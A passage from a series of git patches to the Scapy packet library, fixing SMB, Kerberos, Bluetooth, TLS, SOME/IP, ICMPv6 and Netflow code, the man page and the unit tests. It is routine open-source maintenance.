pkt.Flags.SMB2_FLAGS_ASYNC_COMMAND: - # PID and TID are not set when ASYNC - self.smb_header.TID = pkt.TID - self.smb_header.PID = pkt.PID + self.update_smbheader(pkt) resp = pkt[SMB2_Header].payload if isinstance(resp, SMB2_Error_Response): if pkt.Status == 0x00000103: # STATUS_PENDING From f919a6af6a3c86aacce36958ac530e71c8f7be5b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 19 Mar 2024 22:31:27 +0100 Subject: [PATCH 1238/1632] Fix typo in kerberos.py --- scapy/layers/kerberos.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index e878482c8e7..8306ced16a6 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -3845,13 +3845,13 @@ def GSS_Passive_set_Direction(self, Context: CONTEXT, IsAcceptor=False): if Context.IsAcceptor is not IsAcceptor: return # Swap everything - self.SendSealKeyUsage, self.RecvSealKeyUsage = ( - self.RecvSealKeyUsage, - self.SendSealKeyUsage, + Context.SendSealKeyUsage, Context.RecvSealKeyUsage = ( + Context.RecvSealKeyUsage, + Context.SendSealKeyUsage, ) - self.SendSignKeyUsage, self.RecvSignKeyUsage = ( - self.RecvSignKeyUsage, - self.SendSignKeyUsage, + Context.SendSignKeyUsage, Context.RecvSignKeyUsage = ( + Context.RecvSignKeyUsage, + Context.SendSignKeyUsage, ) Context.IsAcceptor = not Context.IsAcceptor From 389b268681632ea38e2237bb8856bb9d40c0ae06 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Sat, 23 Mar 2024 13:26:35 +0100 Subject: [PATCH 1239/1632] Bluetooth: fix HCI_Cmd_Write_Local_Name command (#4303) --- scapy/layers/bluetooth.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index ae19b9d0d62..fe7714a3488 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1580,7 +1580,7 @@ class HCI_Cmd_Set_Event_Filter(Packet): class HCI_Cmd_Write_Local_Name(Packet): name = "HCI_Write_Local_Name" - fields_desc = [StrField("name", "")] + fields_desc = [StrFixedLenField('name', '', length=248)] class HCI_Cmd_Write_Connect_Accept_Timeout(Packet): From 76e660c65ded08828ea3f8e5791bd93a92f62e48 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Sat, 23 Mar 2024 13:27:04 +0100 Subject: [PATCH 1240/1632] Bluetooth: Fix HCI_Cmd_Read_Remote_Extended_Features binding (#4302) --- scapy/layers/bluetooth.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index fe7714a3488..3bd557989fb 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -2137,7 +2137,7 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_Name_Request_Cancel, ogf=0x01, ocf=0x001a) bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Remote_Supported_Features, ogf=0x01, ocf=0x001b) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Remote_Supported_Features, +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Remote_Extended_Features, ogf=0x01, ocf=0x001c) bind_layers(HCI_Command_Hdr, HCI_Cmd_IO_Capability_Request_Reply, ogf=0x01, ocf=0x002b) bind_layers(HCI_Command_Hdr, HCI_Cmd_User_Confirmation_Request_Reply, From 88c4e408d66b9497e9ad3f6646b47aba988af722 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 23 Mar 2024 22:46:53 +0100 Subject: [PATCH 1241/1632] Fix display() usage instead of show() fixes https://github.com/secdev/scapy/issues/4325 --- scapy/layers/l2.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 8014fe7ecd9..e9e5d1d2746 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -1060,7 +1060,7 @@ def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs): filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs) # noqa: E501 ans = ARPingResult(ans.res, name="PROMISCPing") - ans.display() + ans.show() return ans, unans From 457ca720508c62b1efaffdc38d23e18e4e2bc380 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 24 Mar 2024 21:35:43 +0100 Subject: [PATCH 1242/1632] Update scapy.1: license & content (#4337) --- doc/scapy.1 | 28 ++++++++++++---------------- 1 file changed, 12 insertions(+), 16 deletions(-) diff --git a/doc/scapy.1 b/doc/scapy.1 index 6981fdd692a..5641a11595b 100644 --- a/doc/scapy.1 +++ b/doc/scapy.1 @@ -1,4 +1,5 @@ -.TH SCAPY 1 "May 8, 2018" +\" SPDX-License-Identifier: GPL-2.0-only +.TH SCAPY 1 "March 24, 2024" .SH NAME scapy \- Interactive packet manipulation tool .SH SYNOPSIS @@ -70,11 +71,6 @@ lists supported protocol layers. If a protocol layer is given as parameter, lists its fields and types of fields. If a string is given as parameter, it is used to filter the layers. .TP -\fBexplore()\fR -explores available protocols. -Allows one to look for a layer or protocol through an interactive GUI. -If a Scapy module is given as parameter, explore this specific module. -.TP \fBlsc()\fR lists scapy's main user commands. .TP @@ -84,17 +80,20 @@ this object contains the configuration. .SH FILES \fB$HOME/.config/scapy/prestart.py\fR This file is run before Scapy core is loaded. Only the \fBconf\fP object -is available. This file can be used to manipulate \fBconf.load_layers\fP -list to choose which layers will be loaded: +is available. This file can be used to configure the CLI, or configure +parameters such as the \fBconf.load_layers\fP list to choose which layers +will be loaded, or changing the logging level: .nf +conf.interactive_shell = "bpython" +log_loading.setLevel(logging.WARNING) conf.load_layers.remove("bluetooth") conf.load_layers.append("new_layer") .fi \fB$HOME/.config/scapy/startup.py\fR This file is run after Scapy is loaded. It can be used to configure -some of the Scapy behaviors: +more of Scapy behaviors, like un-registering layers: .nf conf.prog.pdfreader = "xpdf" @@ -103,8 +102,8 @@ split_layers(UDP,DNS) .SH EXAMPLES -More verbose examples are available in the documentation -https://scapy.readthedocs.io/ +More verbose examples are available in the documentation at +\fIhttps://scapy.readthedocs.io/\fP. Just run \fBscapy\fP and try the following commands in the interpreter. .LP @@ -117,7 +116,7 @@ sr(IP(dst="172.16.1.1", ihl=2, options=["verb$2"], version=3)/ICMP(), timeout=2) Packet sniffing and dissection (with a bpf filter or tshark-like output): .nf a=sniff(filter="tcp port 110") -a=sniff(prn = lambda x: x.display) +a=sniff(prn = lambda x: x.show) .fi .LP @@ -203,7 +202,4 @@ BPF filters don't work on Point-to-point interfaces. .SH AUTHOR -Philippe Biondi -.PP -This manual page was written by Alberto Gonzalez Iniesta -and Philippe Biondi. +Philippe Biondi and the Scapy community. From 2b58b51d367924093970ad002f4adeeebb2def2e Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 24 Mar 2024 21:37:05 +0100 Subject: [PATCH 1243/1632] scapy.1 typo --- doc/scapy.1 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/scapy.1 b/doc/scapy.1 index 5641a11595b..395871a8849 100644 --- a/doc/scapy.1 +++ b/doc/scapy.1 @@ -80,9 +80,9 @@ this object contains the configuration. .SH FILES \fB$HOME/.config/scapy/prestart.py\fR This file is run before Scapy core is loaded. Only the \fBconf\fP object -is available. This file can be used to configure the CLI, or configure +is available. This file can be used to configure the CLI, configure parameters such as the \fBconf.load_layers\fP list to choose which layers -will be loaded, or changing the logging level: +will be loaded, or change the logging level (for instance): .nf conf.interactive_shell = "bpython" From 60ee91515cedb50020d8cd8d33320ef6a997d23e Mon Sep 17 00:00:00 2001 From: edhinard Date: Tue, 2 Apr 2024 01:30:44 +0200 Subject: [PATCH 1244/1632] TLS ATMT client: support custom SSLv2ClientHello (#4339) * Taking SSLv2ClientHello messages into account * wrap line --- scapy/layers/tls/automaton_cli.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 26b723012d7..e0f23763063 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -131,7 +131,8 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, self.local_port = None self.socket = None - if isinstance(client_hello, (TLSClientHello, TLS13ClientHello)): + if isinstance(client_hello, (SSLv2ClientHello, TLSClientHello, + TLS13ClientHello)): self.client_hello = client_hello else: self.client_hello = None From ab786f75dcb548209fd7f22b217ff52e66eadc6a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 2 Apr 2024 01:33:28 +0200 Subject: [PATCH 1245/1632] Fix #3750: Use MultipleTypeField in SomeIP (#4317) * Fix #3750: Add MultipleTypeValue with different hints to distinguish between event_id and method_id * additional fixes and improvements * add enum for SD.type * add enum for SD.option.type * make someip tp chunks parsable * bugfix * fix unittest * add support for malformed packets * fix unittest improve parsing * fix flake * fix to short packet dissection * fix unit test * fix unit test * be able to parse malformed packets * cleanup --- scapy/contrib/automotive/someip.py | 119 ++++++++++++++++------------- test/contrib/automotive/someip.uts | 39 +++++----- 2 files changed, 86 insertions(+), 72 deletions(-) diff --git a/scapy/contrib/automotive/someip.py b/scapy/contrib/automotive/someip.py index 32b64376322..09e9c891dc5 100644 --- a/scapy/contrib/automotive/someip.py +++ b/scapy/contrib/automotive/someip.py @@ -7,8 +7,6 @@ # scapy.contrib.description = Scalable service-Oriented MiddlewarE/IP (SOME/IP) # scapy.contrib.status = loads -import ctypes -import collections import struct from scapy.layers.inet import TCP, UDP @@ -16,10 +14,12 @@ from scapy.compat import raw, orb from scapy.config import conf from scapy.packet import Packet, Raw, bind_top_down, bind_bottom_up -from scapy.fields import XShortField, BitEnumField, ConditionalField, \ - BitField, XBitField, IntField, XByteField, ByteEnumField, \ - ShortField, X3BytesField, StrLenField, IPField, FieldLenField, \ - PacketListField, XIntField +from scapy.fields import (XShortField, ConditionalField, + BitField, XBitField, XByteField, ByteEnumField, + ShortField, X3BytesField, StrLenField, IPField, + FieldLenField, PacketListField, XIntField, + MultipleTypeField, FlagsField, IntField, + XByteEnumField, BitScalingField) class SOMEIP(Packet): @@ -62,11 +62,17 @@ class SOMEIP(Packet): fields_desc = [ XShortField("srv_id", 0), - BitEnumField("sub_id", 0, 1, {0: "METHOD_ID", 1: "EVENT_ID"}), - ConditionalField(XBitField("method_id", 0, 15), - lambda pkt: pkt.sub_id == 0), - ConditionalField(XBitField("event_id", 0, 15), - lambda pkt: pkt.sub_id == 1), + MultipleTypeField( + [ + (XShortField("sub_id", 0), + (lambda pkt: False, + lambda pkt, val: val < 0x8000), "method_id"), + (XShortField("sub_id", 0), + (lambda pkt: False, + lambda pkt, val: val >= 0x8000), "event_id"), + ], + XShortField("sub_id", 0), + ), IntField("len", None), XShortField("client_id", 0), XShortField("session_id", 0), @@ -102,14 +108,29 @@ class SOMEIP(Packet): RET_E_MALFORMED_MSG: "E_MALFORMED_MESSAGE", RET_E_WRONG_MESSAGE_TYPE: "E_WRONG_MESSAGE_TYPE", }), - ConditionalField(BitField("offset", 0, 28), - lambda pkt: SOMEIP._is_tp(pkt)), - ConditionalField(BitField("res", 0, 3), - lambda pkt: SOMEIP._is_tp(pkt)), - ConditionalField(BitField("more_seg", 0, 1), - lambda pkt: SOMEIP._is_tp(pkt)) + ConditionalField( + BitScalingField("offset", 0, 28, scaling=16, unit="bytes"), + lambda pkt: SOMEIP._is_tp(pkt)), # noqa: E501 + ConditionalField( + BitField("res", 0, 3), + lambda pkt: SOMEIP._is_tp(pkt)), # noqa: E501 + ConditionalField( + BitField("more_seg", 0, 1), + lambda pkt: SOMEIP._is_tp(pkt)), # noqa: E501 + ConditionalField(PacketListField( + "data", [Raw()], Raw, + length_from=lambda pkt: pkt.len - (SOMEIP.LEN_OFFSET_TP if (SOMEIP._is_tp(pkt) and (pkt.len is None or pkt.len >= SOMEIP.LEN_OFFSET_TP)) else SOMEIP.LEN_OFFSET), # noqa: E501 + next_cls_cb=lambda pkt, lst, cur, remain: + SOMEIP.get_payload_cls_by_srv_id(pkt, lst, cur, remain)), + lambda pkt: SOMEIP._is_tp(pkt)) # noqa: E501 ] + payload_cls_by_srv_id = dict() # To be customized + + @staticmethod + def get_payload_cls_by_srv_id(pkt, lst, cur, remain): + return SOMEIP.payload_cls_by_srv_id.get(pkt.srv_id, Raw) + def post_build(self, pkt, pay): length = self.len if length is None: @@ -135,14 +156,18 @@ def answers(self, other): @staticmethod def _is_tp(pkt): """Returns true if pkt is using SOMEIP-TP, else returns false.""" + if isinstance(pkt, Packet): + return pkt.msg_type & 0x20 + else: + return pkt[15] & 0x20 - tp = [SOMEIP.TYPE_TP_REQUEST, SOMEIP.TYPE_TP_REQUEST_NO_RET, - SOMEIP.TYPE_TP_NOTIFICATION, SOMEIP.TYPE_TP_RESPONSE, - SOMEIP.TYPE_TP_ERROR] + @staticmethod + def _is_sd(pkt): + """Returns true if pkt is using SOMEIP-SD, else returns false.""" if isinstance(pkt, Packet): - return pkt.msg_type in tp + return pkt.srv_id == 0xffff and pkt.sub_id == 0x8100 else: - return pkt[15] in tp + return pkt[:4] == b"\xff\xff\x81\x00" def fragment(self, fragsize=1392): """Fragment SOME/IP-TP""" @@ -188,6 +213,7 @@ def _bind_someip_layers(): class _SDPacketBase(Packet): """ base class to be used among all SD Packet definitions.""" + def extract_padding(self, s): return "", s @@ -205,7 +231,11 @@ def extract_padding(self, s): def _MAKE_SDENTRY_COMMON_FIELDS_DESC(type): return [ - XByteField("type", type), + XByteEnumField("type", type, { + 0: "FindService", + 1: "OfferService", + 6: "SubscribeEventgroup", + 7: "SubscribeEventgroupACK"}), XByteField("index_1", 0), XByteField("index_2", 0), XBitField("n_opt_1", 0, 4), @@ -288,7 +318,15 @@ def _sdoption_class(payload, **kargs): def _MAKE_COMMON_SDOPTION_FIELDS_DESC(type, length=None): return [ ShortField("len", length), - XByteField("type", type), + XByteEnumField("type", type, { + SDOPTION_CFG_TYPE: "Configuration", + SDOPTION_LOADBALANCE_TYPE: "LoadBalancing", + SDOPTION_IP4_ENDPOINT_TYPE: "IPv4Endpoint", + SDOPTION_IP4_MCAST_TYPE: "IPv4MultiCast", + SDOPTION_IP4_SDENDPOINT_TYPE: "IPv4SDEndpoint", + SDOPTION_IP6_ENDPOINT_TYPE: "IPv6Endpoint", + SDOPTION_IP6_MCAST_TYPE: "IPv6MultiCast", + SDOPTION_IP6_SDENDPOINT_TYPE: "IPv6SDEndpoint"}), XByteField("res_hdr", 0) ] @@ -304,7 +342,7 @@ def _MAKE_COMMON_IP_SDOPTION_FIELDS_DESC(): class SDOption_Config(_SDPacketBase): name = "Config Option" fields_desc = _MAKE_COMMON_SDOPTION_FIELDS_DESC(SDOPTION_CFG_TYPE) + [ - StrLenField("cfg_str", "\x00", length_from=lambda pkt: pkt.len - 1) + StrLenField("cfg_str", b"\x00", length_from=lambda pkt: pkt.len - 1) ] def post_build(self, pkt, pay): @@ -420,8 +458,7 @@ class SD(_SDPacketBase): p.option_array = [SDOption_Config(),SDOption_IP6_EndPoint()] """ SOMEIP_MSGID_SRVID = 0xffff - SOMEIP_MSGID_SUBID = 0x1 - SOMEIP_MSGID_EVENTID = 0x100 + SOMEIP_MSGID_SUBID = 0x8100 SOMEIP_CLIENT_ID = 0x0000 SOMEIP_MINIMUM_SESSION_ID = 0x0001 SOMEIP_PROTO_VER = 0x01 @@ -429,16 +466,11 @@ class SD(_SDPacketBase): SOMEIP_MSG_TYPE = SOMEIP.TYPE_NOTIFICATION SOMEIP_RETCODE = SOMEIP.RET_E_OK - _sdFlag = collections.namedtuple('Flag', 'mask offset') - FLAGSDEF = { - "REBOOT": _sdFlag(mask=0x80, offset=7), - "UNICAST": _sdFlag(mask=0x40, offset=6), - "EXPLICIT_INITIAL_DATA_CONTROL": _sdFlag(mask=0x20, offset=5), - } - name = "SD" fields_desc = [ - XByteField("flags", 0), + FlagsField("flags", 0, 8, [ + "res0", "res1", "res2", "res3", "res4", + "EXPLICIT_INITIAL_DATA_CONTROL", "UNICAST", "REBOOT"]), X3BytesField("res", 0), FieldLenField("len_entry_array", None, length_of="entry_array", fmt="!I"), @@ -450,21 +482,6 @@ class SD(_SDPacketBase): length_from=lambda pkt: pkt.len_option_array) ] - def get_flag(self, name): - name = name.upper() - if name in self.FLAGSDEF: - return ((self.flags & self.FLAGSDEF[name].mask) >> - self.FLAGSDEF[name].offset) - else: - return None - - def set_flag(self, name, value): - name = name.upper() - if name in self.FLAGSDEF: - self.flags = (self.flags & - (ctypes.c_ubyte(~self.FLAGSDEF[name].mask).value)) \ - | ((value & 0x01) << self.FLAGSDEF[name].offset) - def set_entryArray(self, entry_list): if isinstance(entry_list, list): self.entry_array = entry_list @@ -483,7 +500,6 @@ def set_optionArray(self, option_list): sub_id=SD.SOMEIP_MSGID_SUBID, client_id=SD.SOMEIP_CLIENT_ID, session_id=SD.SOMEIP_MINIMUM_SESSION_ID, - event_id=SD.SOMEIP_MSGID_EVENTID, proto_ver=SD.SOMEIP_PROTO_VER, iface_ver=SD.SOMEIP_IFACE_VER, msg_type=SD.SOMEIP_MSG_TYPE, @@ -492,7 +508,6 @@ def set_optionArray(self, option_list): bind_bottom_up(SOMEIP, SD, srv_id=SD.SOMEIP_MSGID_SRVID, sub_id=SD.SOMEIP_MSGID_SUBID, - event_id=SD.SOMEIP_MSGID_EVENTID, proto_ver=SD.SOMEIP_PROTO_VER, iface_ver=SD.SOMEIP_IFACE_VER, msg_type=SD.SOMEIP_MSG_TYPE, diff --git a/test/contrib/automotive/someip.uts b/test/contrib/automotive/someip.uts index 37b32e85d12..f3e33283547 100644 --- a/test/contrib/automotive/someip.uts +++ b/test/contrib/automotive/someip.uts @@ -55,12 +55,10 @@ binstr = b"\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x01\x00\x00\xde\ assert pstr == binstr = Dissect EVENT_ID packet -p = SOMEIP(b"\x11\x11\x81\x11\x00\x00\x00\x04\x33\x33\x44\x44\x02\x03\x04\x05") +p = SOMEIP(b"\x11\x11\x81\x11\x00\x00\x00\x08\x33\x33\x44\x44\x02\x03\x04\x05") assert p.srv_id == 0x1111 -assert p.sub_id == 0x1 -assert p.method_id == None -assert p.event_id == 0x0111 +assert p.sub_id == 0x8111 assert p.client_id == 0x3333 assert p.session_id == 0x4444 assert p.proto_ver == 0x02 @@ -68,13 +66,12 @@ assert p.iface_ver == 0x03 assert p.msg_type == 0x04 assert p.retcode == 0x05 + = Dissect METHOD_ID packet -p = SOMEIP(b"\x11\x11\x01\x11\x00\x00\x00\x04\x33\x33\x44\x44\x02\x03\x04\x05") +p = SOMEIP(b"\x11\x11\x01\x11\x00\x00\x00\x08\x33\x33\x44\x44\x02\x03\x04\x05") assert p.srv_id == 0x1111 -assert p.sub_id == 0x0 -assert p.method_id == 0x0111 -assert p.event_id == None +assert p.sub_id == 0x0111 assert p.client_id == 0x3333 assert p.session_id == 0x4444 assert p.proto_ver == 0x02 @@ -196,27 +193,25 @@ assert p.eventgroup_id == 0x8888 = Build and check flags p = SD() -p.set_flag("REBOOT", 1) +p.flags = "REBOOT" assert p.flags == 0x80 -p.set_flag("REBOOT", 0) +p.flags = "" assert p.flags == 0x00 -p.set_flag("UNICAST", 1) +p.flags = "UNICAST" assert p.flags == 0x40 -p.set_flag("UNICAST", 0) +p.flags = "" assert p.flags == 0x00 -p.set_flag("EXPLICIT_INITIAL_DATA_CONTROL", 1) +p.flags = "EXPLICIT_INITIAL_DATA_CONTROL" assert p.flags == 0x20 -p.set_flag("EXPLICIT_INITIAL_DATA_CONTROL", 0) +p.flags = "" assert p.flags == 0x00 -p.set_flag("REBOOT", 1) -p.set_flag("UNICAST", 1) -p.set_flag("EXPLICIT_INITIAL_DATA_CONTROL", 1) +p.flags = "REBOOT+UNICAST+EXPLICIT_INITIAL_DATA_CONTROL" assert p.flags == 0xe0 + SD Get SOME/IP Packet @@ -227,8 +222,7 @@ assert len(bytes(p)) == SOMEIP._OVERALL_LEN_NOPAYLOAD + 12 = Verify constants against spec TR_SOMEIP_00250 assert SD.SOMEIP_MSGID_SRVID == 0xffff -assert SD.SOMEIP_MSGID_SUBID == 0x1 -assert SD.SOMEIP_MSGID_EVENTID == 0x0100 +assert SD.SOMEIP_MSGID_SUBID == 0x8100 assert SD.SOMEIP_CLIENT_ID == 0x0000 assert SD.SOMEIP_MINIMUM_SESSION_ID == 0x0001 assert SD.SOMEIP_PROTO_VER == 0x01 @@ -239,7 +233,6 @@ assert SD.SOMEIP_RETCODE == 0x00 = check that values are bound assert p[SOMEIP].srv_id == SD.SOMEIP_MSGID_SRVID assert p[SOMEIP].sub_id == SD.SOMEIP_MSGID_SUBID -assert p[SOMEIP].event_id == SD.SOMEIP_MSGID_EVENTID assert p[SOMEIP].client_id == SD.SOMEIP_CLIENT_ID assert p[SOMEIP].session_id != 0x0000 assert p[SOMEIP].session_id >= SD.SOMEIP_MINIMUM_SESSION_ID @@ -728,3 +721,9 @@ _opts_check(opts) _opts_check(opts[::-1]) _opts_check(opts + opts[::-1]) + += build test SOMEIP/TP + +p = SOMEIP(srv_id=1234, sub_id=4321, msg_type=0xff, retcode=0xff, offset=4294967040, data=[Raw(b"deadbeef")]) + +assert p.data[0].load == b"deadbeef" From 7ec4c51aa30cfe2f6f892307f84b259d89085cb6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 2 Apr 2024 07:35:30 +0200 Subject: [PATCH 1246/1632] Fix ICMPv6 hashret()/answers() with IPv6ExtHdrDestOpt (#4333) --- scapy/layers/inet6.py | 4 ++-- test/scapy/layers/inet6.uts | 8 +++++++- 2 files changed, 9 insertions(+), 3 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 77f9ae5ae08..7a26613d563 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -394,8 +394,8 @@ def hashret(self): if isinstance(o, HAO): foundhao = o if foundhao: - nh = self.payload.nh # XXX what if another extension follows ? ss = foundhao.hoa + nh = self.payload.nh # XXX what if another extension follows ? if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): sd = inet_pton(socket.AF_INET6, sd) @@ -451,7 +451,7 @@ def answers(self, other): elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): - return self.payload.payload.answers(other.payload.payload) + return self.payload.answers(other.payload.payload) elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 return self.payload.payload.answers(other.payload) else: diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index d878b2d3613..7b5b8f516cb 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -455,7 +455,13 @@ b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(id=0x6666, seq=0x7777 a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(id=0x6666, seq=0x7777, data="somedata") (a > b) == True -= ICMPv6EchoRequest and ICMPv6EchoReply - live answers() use Net6 += ICMPv6EchoRequest and ICMPv6EchoReply - answers() test 7 - IPv6ExtHdrDestOpt +b = IPv6(b'`\x0f\\\xe3\x00\x08:@\xfe\x80\x00\x00\x00\x00\x00\x00\x02PV\xff\xfe\x84\x1c\x14\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&\x81\x00\r\xad\x00\x00\x00\x00') +a = IPv6(b'`\x00\x00\x00\x00\x10<\xff\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&\xfe\x80\x00\x00\x00\x00\x00\x00\x02PV\xff\xfe\x84\x1c\x14:\x00\x00\x00\x00\x00\x00\x00\x80\x00\x0e\xad\x00\x00\x00\x00') +assert a.hashret() == b.hashret() +assert b.answers(a) + += ICMPv6EchoRequest and ICMPv6EchoReply - answers() test 8 - (live) use Net6 ~ netaccess ipv6 a = IPv6(dst="www.google.com")/ICMPv6EchoRequest() From 0a2b2bcff17b45106fc81aeecb9ba48fe75f916c Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 2 Apr 2024 08:13:27 +0200 Subject: [PATCH 1247/1632] Unify dicts for Netflow fields (#4335) --- scapy/fields.py | 4 - scapy/layers/netflow.py | 2031 +++++++++++++++++++-------------------- 2 files changed, 1005 insertions(+), 1030 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 7644fd23fb6..e14beb27c9d 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -3483,8 +3483,6 @@ class UTCTimeField(Field[float, int]): __slots__ = ["epoch", "delta", "strf", "use_msec", "use_micro", "use_nano", "custom_scaling"] - # Do not change the order of the keywords in here - # Netflow heavily rely on this def __init__(self, name, # type: str default, # type: int @@ -3542,8 +3540,6 @@ def i2m(self, pkt, x): class SecondsIntField(Field[float, int]): __slots__ = ["use_msec", "use_micro", "use_nano"] - # Do not change the order of the keywords in here - # Netflow heavily rely on this def __init__(self, name, default, use_msec=False, use_micro=False, diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index 69cfc6b77a3..ef0fe8e9646 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -30,8 +30,10 @@ """ +import dataclasses import socket import struct + from collections import Counter from scapy.config import conf @@ -71,6 +73,8 @@ # Typing imports from typing import ( + Any, + Dict, Optional, ) @@ -192,917 +196,17 @@ class NetflowRecordV5(Packet): # https://tools.ietf.org/html/rfc5101 # https://tools.ietf.org/html/rfc5655 -# This is v9_v10_template_types (with names from the rfc for the first 79) -# https://github.com/wireshark/wireshark/blob/master/epan/dissectors/packet-netflow.c # noqa: E501 -# (it has all values external to the RFC) -NTOP_BASE = 57472 -NetflowV910TemplateFieldTypes = { - 1: "IN_BYTES", - 2: "IN_PKTS", - 3: "FLOWS", - 4: "PROTOCOL", - 5: "TOS", - 6: "TCP_FLAGS", - 7: "L4_SRC_PORT", - 8: "IPV4_SRC_ADDR", - 9: "SRC_MASK", - 10: "INPUT_SNMP", - 11: "L4_DST_PORT", - 12: "IPV4_DST_ADDR", - 13: "DST_MASK", - 14: "OUTPUT_SNMP", - 15: "IPV4_NEXT_HOP", - 16: "SRC_AS", - 17: "DST_AS", - 18: "BGP_IPV4_NEXT_HOP", - 19: "MUL_DST_PKTS", - 20: "MUL_DST_BYTES", - 21: "LAST_SWITCHED", - 22: "FIRST_SWITCHED", - 23: "OUT_BYTES", - 24: "OUT_PKTS", - 25: "IP_LENGTH_MINIMUM", - 26: "IP_LENGTH_MAXIMUM", - 27: "IPV6_SRC_ADDR", - 28: "IPV6_DST_ADDR", - 29: "IPV6_SRC_MASK", - 30: "IPV6_DST_MASK", - 31: "IPV6_FLOW_LABEL", - 32: "ICMP_TYPE", - 33: "MUL_IGMP_TYPE", - 34: "SAMPLING_INTERVAL", - 35: "SAMPLING_ALGORITHM", - 36: "FLOW_ACTIVE_TIMEOUT", - 37: "FLOW_INACTIVE_TIMEOUT", - 38: "ENGINE_TYPE", - 39: "ENGINE_ID", - 40: "TOTAL_BYTES_EXP", - 41: "TOTAL_PKTS_EXP", - 42: "TOTAL_FLOWS_EXP", - 43: "IPV4_ROUTER_SC", - 44: "IP_SRC_PREFIX", - 45: "IP_DST_PREFIX", - 46: "MPLS_TOP_LABEL_TYPE", - 47: "MPLS_TOP_LABEL_IP_ADDR", - 48: "FLOW_SAMPLER_ID", - 49: "FLOW_SAMPLER_MODE", - 50: "FLOW_SAMPLER_RANDOM_INTERVAL", - 51: "FLOW_CLASS", - 52: "IP TTL MINIMUM", - 53: "IP TTL MAXIMUM", - 54: "IPv4 ID", - 55: "DST_TOS", - 56: "SRC_MAC", - 57: "DST_MAC", - 58: "SRC_VLAN", - 59: "DST_VLAN", - 60: "IP_PROTOCOL_VERSION", - 61: "DIRECTION", - 62: "IPV6_NEXT_HOP", - 63: "BGP_IPV6_NEXT_HOP", - 64: "IPV6_OPTION_HEADERS", - 70: "MPLS_LABEL_1", - 71: "MPLS_LABEL_2", - 72: "MPLS_LABEL_3", - 73: "MPLS_LABEL_4", - 74: "MPLS_LABEL_5", - 75: "MPLS_LABEL_6", - 76: "MPLS_LABEL_7", - 77: "MPLS_LABEL_8", - 78: "MPLS_LABEL_9", - 79: "MPLS_LABEL_10", - 80: "DESTINATION_MAC", - 81: "SOURCE_MAC", - 82: "IF_NAME", - 83: "IF_DESC", - 84: "SAMPLER_NAME", - 85: "BYTES_TOTAL", - 86: "PACKETS_TOTAL", - 88: "FRAGMENT_OFFSET", - 89: "FORWARDING_STATUS", - 90: "VPN_ROUTE_DISTINGUISHER", - 91: "mplsTopLabelPrefixLength", - 92: "SRC_TRAFFIC_INDEX", - 93: "DST_TRAFFIC_INDEX", - 94: "APPLICATION_DESC", - 95: "APPLICATION_ID", - 96: "APPLICATION_NAME", - 98: "postIpDiffServCodePoint", - 99: "multicastReplicationFactor", - 101: "classificationEngineId", - 128: 